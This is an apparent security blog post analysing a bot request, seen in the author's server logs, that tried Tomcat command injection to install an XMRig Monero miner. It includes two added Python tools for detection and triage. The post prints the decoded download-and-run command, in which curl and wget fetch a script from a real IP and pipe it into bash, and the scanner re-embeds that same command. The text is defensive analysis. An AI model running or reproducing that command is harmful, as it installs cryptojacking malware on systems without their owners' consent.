March 18, 2025 | Connor Gadbois
Malware Analysis
Recently I was looking through the logs for this website when I noticed an interesting request.
Bots will often look for WordPress plugins that can be exploited, or for common web server misconfigurations that expose data. This one is different: it carries a payload. On the surface it appears to be trying to exploit Apache Tomcat through a command injection vulnerability. Decoding the base64-encoded payload, we get:
export HOME=/tmp; curl -s -L http://46.8.226.196/scripts/ .sh | bash -s; wget -qO- http://46.8.226.196/scripts/4thepool_miner.sh | bash -s
The payload is meant to place this "4thepool_miner.sh" script into the /tmp folder and execute it.
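As an added example (not code from the original post), here is a small Python scanner that does what the post describes by hand: it walks web server access log lines, pulls base64-looking blobs out of each request, decodes them, and flags any that pipe a downloader straight into a shell. The log lines, the client IPs and the `?cmd=` parameter are constructed for the demonstration; the decoded command is the one quoted above, re-encoded so the sample line carries it the way the observed request did.

```python
import base64
import re
from typing import Optional
from urllib.parse import unquote, urlparse

# Constructed sample: the decoded command quoted in the post, re-encoded so the
# first sample log line below carries it the way the observed request did.
OBSERVED_COMMAND = (
    "export HOME=/tmp; curl -s -L http://46.8.226.196/scripts/ .sh | bash -s; "
    "wget -qO- http://46.8.226.196/scripts/4thepool_miner.sh | bash -s"
)
ENCODED = base64.b64encode(OBSERVED_COMMAND.encode()).decode()

# Constructed access-log lines in combined log format (client IPs are from
# documentation ranges, the ?cmd= parameter is made up). Only the first one
# carries an encoded payload; the other two are ordinary bot and user traffic.
SAMPLE_LOG = [
    f'203.0.113.7 - - [18/Mar/2025:10:01:02 +0000] "GET /?cmd={ENCODED} HTTP/1.1" 404 196 "-" "python-requests/2.31"',
    '203.0.113.8 - - [18/Mar/2025:10:01:05 +0000] "GET /wp-content/plugins/ HTTP/1.1" 404 196 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [18/Mar/2025:10:02:11 +0000] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"',
]

LOG_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)"')
# Runs of base64 alphabet long enough to hold a command (24+ chars, optional padding).
B64_RE = re.compile(r"[A-Za-z0-9+/]{24,}={0,2}")
# A downloader piped straight into an interpreter: curl/wget ... | bash, sh, zsh, dash.
PIPE_TO_SHELL_RE = re.compile(r"\b(curl|wget)\b[^|\n]*\|\s*(?:ba|z|da)?sh\b")
URL_RE = re.compile(r"https?://[^\s|;\"']+")


def decode_candidate(blob: str) -> Optional[str]:
    """Return the blob decoded as printable UTF-8 text, or None if it is not."""
    try:
        text = base64.b64decode(blob, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
        return None
    if not all(c.isprintable() or c in "\t\n\r" for c in text):
        return None
    return text


def scan_log(lines) -> list:
    """Return one finding per request that carries an encoded download-and-run command."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        # Percent-decode first: '+', '/' and '=' are often URL-encoded in the wild.
        req = unquote(m.group("req"))
        for blob in B64_RE.findall(req):
            text = decode_candidate(blob)
            if text is None or not PIPE_TO_SHELL_RE.search(text):
                continue
            urls = URL_RE.findall(text)
            findings.append({
                "src": m.group("src"),
                "time": m.group("ts"),
                "command": text,
                "urls": urls,
                # Hosts serving the second stage, the IoC worth blocking or hunting for.
                "hosts": sorted({urlparse(u).hostname for u in urls}),
            })
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['time']} {f['src']} -> hosts {f['hosts']}")
        print("  decoded:", f["command"])
```

The printable-text check and the pipe-to-shell pattern are what keep the noise down: long base64-looking path segments are common in legitimate traffic, but they rarely decode to text and almost never to a downloader feeding a shell.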
The script installs, configures, and runs XMRig, a Monero miner. Interestingly, it isn't obfuscated at all; it looks like a script someone would use to quickly set up XMRig on their own system. All of the comments are still in the file, it is very verbose, and it makes no attempt to hide itself. Browsing the web server hosting the script, it doesn't appear that any other scripts are in use.
Additionally, it doesn't seem that they have set up this Apache server beyond placing the scripts folder on it. The default page is still present, and no steps have been taken to hide what this server is doing.
All of this leads me to believe that this isn't a very advanced campaign. The server belongs to a Chinese cloud provider, meaning the attacker most likely found an exploit, put it into a bot, and let it send the payload to every web server it could find. The few servers it is able to successfully exploit and set up a miner on are unlikely to be powerful enough to mine Monero quickly. The point of the bot is to cast as wide a net as possible: they are hoping to gather a handful of machines with enough combined compute to make the campaign profitable.
The name "4thepool" made me think this might have been an attempt to donate compute to an XMR pool. However, the wallet being used doesn't appear to be a donation address for the pool the script uses, or for any other pool I could find. The script may have been written with the intention of letting people donate to an XMR pool, but has been repurposed for profit.
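Checking which wallet and pool a setup script uses, as the post does for the wallet here, is quicker with a small triage helper. The following Python is an added example, not part of the post or of the script it analyses; the sample script, the `.invalid` hostnames and the wallet string are constructed placeholders. It expands simple shell variable assignments before matching, since unobfuscated miner scripts usually keep the pool and wallet in variables and pass them on the miner's command line, and it also lists download URLs and persistence indicators so a responder knows what to look for on an affected host.

```python
import re

# Constructed Monero-style address: 95 base58 characters starting with '4'.
# It is a placeholder built from a repeated pattern, not a real wallet.
CONSTRUCTED_WALLET = "4" + ("123456789ABCDEFGHJK" * 5)[:94]

# Constructed stand-in for an unobfuscated miner setup script. The hostnames
# use the reserved .invalid TLD, so nothing here points at a real server.
SAMPLE_SCRIPT = f'''#!/bin/bash
# install and run xmrig, then mine for the pool
WALLET="{CONSTRUCTED_WALLET}"
POOL="pool.example.invalid:3333"
mkdir -p "$HOME/xmrig" && cd "$HOME/xmrig"
curl -s -L https://download.example.invalid/xmrig.tar.gz | tar xz
nohup ./xmrig -o $POOL -u $WALLET -p worker1 --donate-level=1 >/dev/null 2>&1 &
'''

# NAME=value or NAME="value" at the start of a line (optionally after 'export').
ASSIGN_RE = re.compile(r'^\s*(?:export\s+)?([A-Za-z_]\w*)=["\']?([^"\'\n]*)["\']?\s*$', re.M)
# Standard Monero address shape: '4' or '8' followed by 94 base58 characters.
MONERO_RE = re.compile(r"\b[48][1-9A-HJ-NP-Za-km-z]{94}\b")
# Pool given on the miner command line (-o / --url) or as a stratum URL.
POOL_RE = re.compile(r"(?<!\S)(?:-o|--url)[=\s]+(\S+)")
STRATUM_RE = re.compile(r"stratum\+(?:tcp|ssl)://\S+")
URL_RE = re.compile(r"https?://[^\s|;\"']+")
# Ways a script commonly keeps the miner running or restarts it.
PERSIST_RE = re.compile(r"crontab|/etc/cron\S*|systemctl\s+enable|\.service\b|rc\.local|nohup|setsid")


def expand_vars(text: str) -> str:
    """Substitute $NAME and ${NAME} with values assigned in the same script.

    Variables the script never assigns (e.g. $HOME) are left untouched.
    """
    env = dict(ASSIGN_RE.findall(text))

    def sub(m):
        name = m.group(1) or m.group(2)
        return env.get(name, m.group(0))

    return re.sub(r"\$\{(\w+)\}|\$(\w+)", sub, text)


def triage_miner_script(text: str) -> dict:
    """Pull the indicators a responder wants out of a miner install script."""
    expanded = expand_vars(text)
    pools = set(POOL_RE.findall(expanded)) | set(STRATUM_RE.findall(expanded))
    return {
        "mentions_xmrig": bool(re.search(r"xmrig", expanded, re.I)),
        "wallets": sorted(set(MONERO_RE.findall(expanded))),
        "pools": sorted(pools),
        "download_urls": sorted(set(URL_RE.findall(expanded))),
        "persistence": sorted({m.lower() for m in PERSIST_RE.findall(expanded)}),
    }


if __name__ == "__main__":
    for key, value in triage_miner_script(SAMPLE_SCRIPT).items():
        print(f"{key}: {value}")
```

The wallet and pool it reports are what you compare against the pool's published donation address, which is exactly the comparison the post makes; the download URLs and persistence indicators are the host-side artifacts to hunt for if the script ever ran.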